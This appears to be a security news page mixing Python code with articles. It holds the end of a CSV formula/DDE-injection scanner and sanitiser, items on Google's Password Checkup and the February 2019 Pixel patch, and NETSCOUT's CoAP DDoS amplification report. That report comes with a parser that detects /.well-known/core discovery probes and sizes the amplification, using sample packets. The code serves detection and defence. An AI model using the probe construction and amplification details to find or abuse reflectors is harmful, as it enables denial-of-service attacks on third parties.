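    return "dde" if DDE_RE.search(cell) else "formula"

def scan_csv(text: str) -> List[Tuple[int, int, str, str]]:
    """(row, column, kind, cell) for every formula-bearing cell, 1-based."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(text, newline="")), 1):
        for c, cell in enumerate(row, 1):
            kind = classify_cell(cell)
            if kind != "safe":
                hits.append((r, c, kind, cell))
    return hits

def sanitize_cell(cell: str) -> str:
    """Prefix a leading apostrophe so Excel stores the cell as text."""
    return "'" + cell if classify_cell(cell) != "safe" else cell

def sanitize_csv(text: str) -> str:
    out = io.StringIO(newline="")
    writer = csv.writer(out, quoting=csv.QUOTE_ALL)
    for row in csv.reader(io.StringIO(text, newline="")):
        writer.writerow([sanitize_cell(cell) for cell in row])
    return out.getvalue()

if __name__ == "__main__":
    for row, col, kind, cell in scan_csv(SAMPLE_CSV):
        print(f"row {row} col {col}: {kind}: {cell[:60]}")
```

The number check matters in practice: an export full of negative amounts would otherwise be reported as hundreds of formulas. The sanitised output still round-trips through csv.reader, and scanning it again finds nothing, which is the property to assert in any pipeline that accepts user-supplied CSV.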

Though the issue has been reported to Google by the security researcher, it has not been considered as a security bug by the company.

Google adds Password Checkup Chrome extension

Google has rolled out a new Chrome extension that will inform users if their passwords have been compromised.

The service, which was introduced as part of Google’s Safer Internet Day offerings, is called Password Checkup. The Chrome extension checks a person’s username and password against a list of four billion credentials that are known to be compromised. If a match occurs the extension will automatically warn the user and suggest the password in question be changed.

“We built Password Checkup so that no one, including Google, can learn your account details. To do this, we developed privacy-protecting techniques with the help of cryptography researchers at both Google and Stanford University,” Google said in a blog post.

The extension is now available.

Google has also implemented an additional layer of security called Cross Account Protection. This security service, which the company already supplies to Google accounts, is now being extended to apps and websites where people use Google Sign In to gain access. 

Websites that adopt the service will receive a notification if a user’s credentials have been exposed so the third-party site can implement the proper security protocols and notify the individual.

“We created Cross Account Protection by working closely with other major technology companies, like Adobe, and the standards community at the Internet Engineering Task Force (IETF) and OpenID Foundation to make this easy for all apps to implement,” Google said, adding that it is included by default for app developers using Firebase or Google Cloud Identity for Customers & Partners.

Google releases February 2019 security patch for Pixel devices, Essential Phone gets updated too

Google has started pushing out the latest monthly Android security update for its Pixel smartphones and the Pixel C tablet. On Monday, the Google Pixel 3, Pixel 3 XL, Pixel 2, Pixel 2 XL, Pixel, Pixel XL and Pixel C received the February 2019 security patch along with bug fixes. In parallel, Essential has rolled out the February 2019 security update for the Essential Phone.

Google has also published OTA images and factory images of the Android security update for Pixel devices. The changelog lists 15 issues, but Google says it has received no reports of customers being affected; all of them are now fixed. Unlike previous patches, this one does not include any functional update.

“The most severe of these issues is a critical security vulnerability in Framework that could allow a remote attacker using a specially crafted PNG file to execute arbitrary code within the context of a privileged process. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed. We have had no reports of active customer exploitation or abuse of these newly reported issues,” noted Google on Android Security Bulletin.

At the same time, Essential has tweeted about the update for the Essential Phone, noting that the February security patch is rolling out now, so users should keep an eye out for it.

A month ago, Google’s January 2019 Android security update brought fixes for a lot of issues and security vulnerabilities at the kernel and system level. Notably, the latest Pixel 3 and Pixel 3 XL also got enhanced audio quality while recording videos.

Google’s New Tool Alerts When You Use Compromised Credentials On Any Site

With so many data breaches happening almost every week, it has become difficult for users to know if their credentials are already in possession of hackers or being circulated freely across the Internet.

Thankfully, Google has a solution.

Today, February 5, on Safer Internet Day, Google launches a new service that has been designed to alert users when they use an exact combination of username and password for any website that has previously been exposed in any third-party data breach.

The new service, initially made available as a free Chrome browser extension called Password Checkup, works by automatically comparing the credentials a user enters on any site against an encrypted database of over 4 billion compromised credentials.

If the credentials are found in the list of compromised ones, Password Checkup will prompt users to change their password.

Wondering if Google can see your login credentials? No, the company has used a privacy-oriented implementation that keeps all your information private and anonymous by encrypting your credentials before checking them against its online database.

You can also check this easy 4-step visual explanation to learn more about how it works under the hood.

The Chrome browser extension, Password Checkup, is available from today, and anyone can download it for free.

Besides launching the new Chrome extension, Google also lists five Official Security Tips, which include keeping your software up to date, using a unique password for every site, taking the Google Security Checkup, setting up a recovery phone number or email address, and using two-factor authentication.

Chrome users can follow these security tips to keep themselves safe on the Internet.

Attackers Use CoAP for DDoS Amplification

Attackers have recently started abusing the Constrained Application Protocol (CoAP) for reflection/amplification distributed denial of service (DDoS) attacks, NETSCOUT warns.

CoAP is a lightweight protocol designed for low-power devices on unreliable networks. It resembles HTTP but runs over UDP (User Datagram Protocol) port 5683. The protocol is mainly used by mobile phones in China, but is also present in Internet of Things (IoT) devices.

A DDoS attack leveraging CoAP begins with scans for devices that can be abused and continues with a flood of packets whose source address is spoofed to that of the target. At the moment the attackers appear to have only basic knowledge of the protocol, but attacks could become more sophisticated.

According to NETSCOUT’s security researchers, the scanning for the CoAP protocol has been constant, with almost all GET requests for “/.well-known/core”. In January 2019, however, the researchers noticed a spike in the number of DDoS attacks leveraging the protocol. 

The average amplification factor for CoAP is 34 and the vast majority of Internet-accessible CoAP devices reside in China and utilize a mobile peer-to-peer network, the researchers reveal. With CoAP devices transient by nature and their addresses changing within weeks, attackers need to continually rescan to find IPs to abuse. 

Even so, it is possible for a threat actor to build a list of IPs that respond to CoAP, and then abuse these devices to continually send a flood of packets with a spoofed source address of the intended target, NETSCOUT says. 

The DDoS attacks leveraging CoAP hit targets “geographically and logically well distributed, with little commonality between them.” The attacks last on average just over 90 seconds and feature around 100 packets per second.

The security researchers found 388,344 CoAP devices on the Internet, 81% of them in China, with others in Brazil, Morocco, South Korea and the United States. Most of the devices in China answered /.well-known/core with a QLC Chain (a peer-to-peer network) response.

Because the IP addresses of CoAP devices change often, the vast majority of devices will have a different IP address within two weeks. This makes CoAP less efficient for organizing DDoS attacks than SSDP, which has a similar amplification factor but whose devices do not move on the network as often.

Although there are around 12 times as many SSDP devices accessible on the Internet compared to CoAP, attackers still decided to add the CoAP reflection/amplification DDoS vector to their arsenal, meaning that the protocol is likely to continue being abused in attacks. 

“With the vast majority of CoAP devices being located in China and running QLC Chain, it appears that the currently-abusable CoAP reflectors/amplifiers are part of a limited-scope software monoculture that will likely change as CoAP grows in popularity. The initial wave of attacks utilizes well known behavior of the protocol but there are other features, perhaps not as widely implemented, that could make CoAP even more effective,” NETSCOUT concludes. 
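To make the protocol concrete from a defender's side, here is an added Python example (not NETSCOUT's code or any CoAP library) that parses the CoAP header and options as laid out in RFC 7252, recognises the GET /.well-known/core discovery probe mentioned above, and measures the reply-to-request size ratio; the probe and reply bytes are constructed samples, not captured traffic.

```python
import struct
CODE_GET = 0x01    # CoAP method code 0.01 = GET
OPT_URI_PATH = 11  # option number of Uri-Path (RFC 7252, section 5.10)

def _read_ext(nibble, data, pos):
    # A 4-bit option delta/length of 13 or 14 is extended by one or two bytes.
    if nibble < 13:
        return nibble, pos
    if nibble == 13:
        return data[pos] + 13, pos + 1
    if nibble == 14:
        return struct.unpack("!H", data[pos:pos + 2])[0] + 269, pos + 2
    raise ValueError("reserved option nibble 15")

def parse_coap(data):
    # Fixed 4-byte header: Ver(2) Type(2) TKL(4) | Code(8) | Message ID(16)
    if len(data) < 4 or data[0] >> 6 != 1:
        raise ValueError("not a CoAP version 1 message")
    msg = {"type": (data[0] >> 4) & 0x3, "code": data[1],
           "msg_id": struct.unpack("!H", data[2:4])[0]}
    pos, number, paths = 4 + (data[0] & 0x0F), 0, []  # skip the token
    while pos < len(data) and data[pos] != 0xFF:       # 0xFF = payload marker
        hi, lo = data[pos] >> 4, data[pos] & 0x0F
        delta, pos = _read_ext(hi, data, pos + 1)
        length, pos = _read_ext(lo, data, pos)
        number += delta                                 # option numbers are deltas
        if number == OPT_URI_PATH:
            paths.append(data[pos:pos + length].decode("utf-8", "replace"))
        pos += length
    msg["uri_path"] = "/" + "/".join(paths)
    msg["payload"] = bytes(data[pos + 1:]) if pos < len(data) else b""
    return msg

def is_discovery_probe(data):
    # The GET /.well-known/core request NETSCOUT saw scanners use to find reflectors.
    try:
        msg = parse_coap(data)
    except (ValueError, IndexError, struct.error):
        return False
    return msg["code"] == CODE_GET and msg["uri_path"] == "/.well-known/core"

def amplification_factor(request, response):
    # Bytes a reflector returns per byte the spoofed request cost the attacker.
    return len(response) / len(request)

# Constructed sample probe: CON GET /.well-known/core, message ID 0x1234, no token.
PROBE = bytes([0x40, CODE_GET, 0x12, 0x34, 0xBB]) + b".well-known" + b"\x04core"
# Constructed sample reply: ACK 2.05 Content, Content-Format 40 (link-format), short directory.
RESPONSE = (bytes([0x60, 0x45, 0x12, 0x34, 0xC1, 0x28, 0xFF])
            + b'</sensors/temp>;rt="temperature";if="sensor",</sensors/light>;rt="light-lux"')
```

Running is_discovery_probe over inbound datagrams to UDP 5683 at a network edge separates the discovery scans from legitimate traffic, and the size ratio shows why even a tiny resource directory makes a device usable as a reflector.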
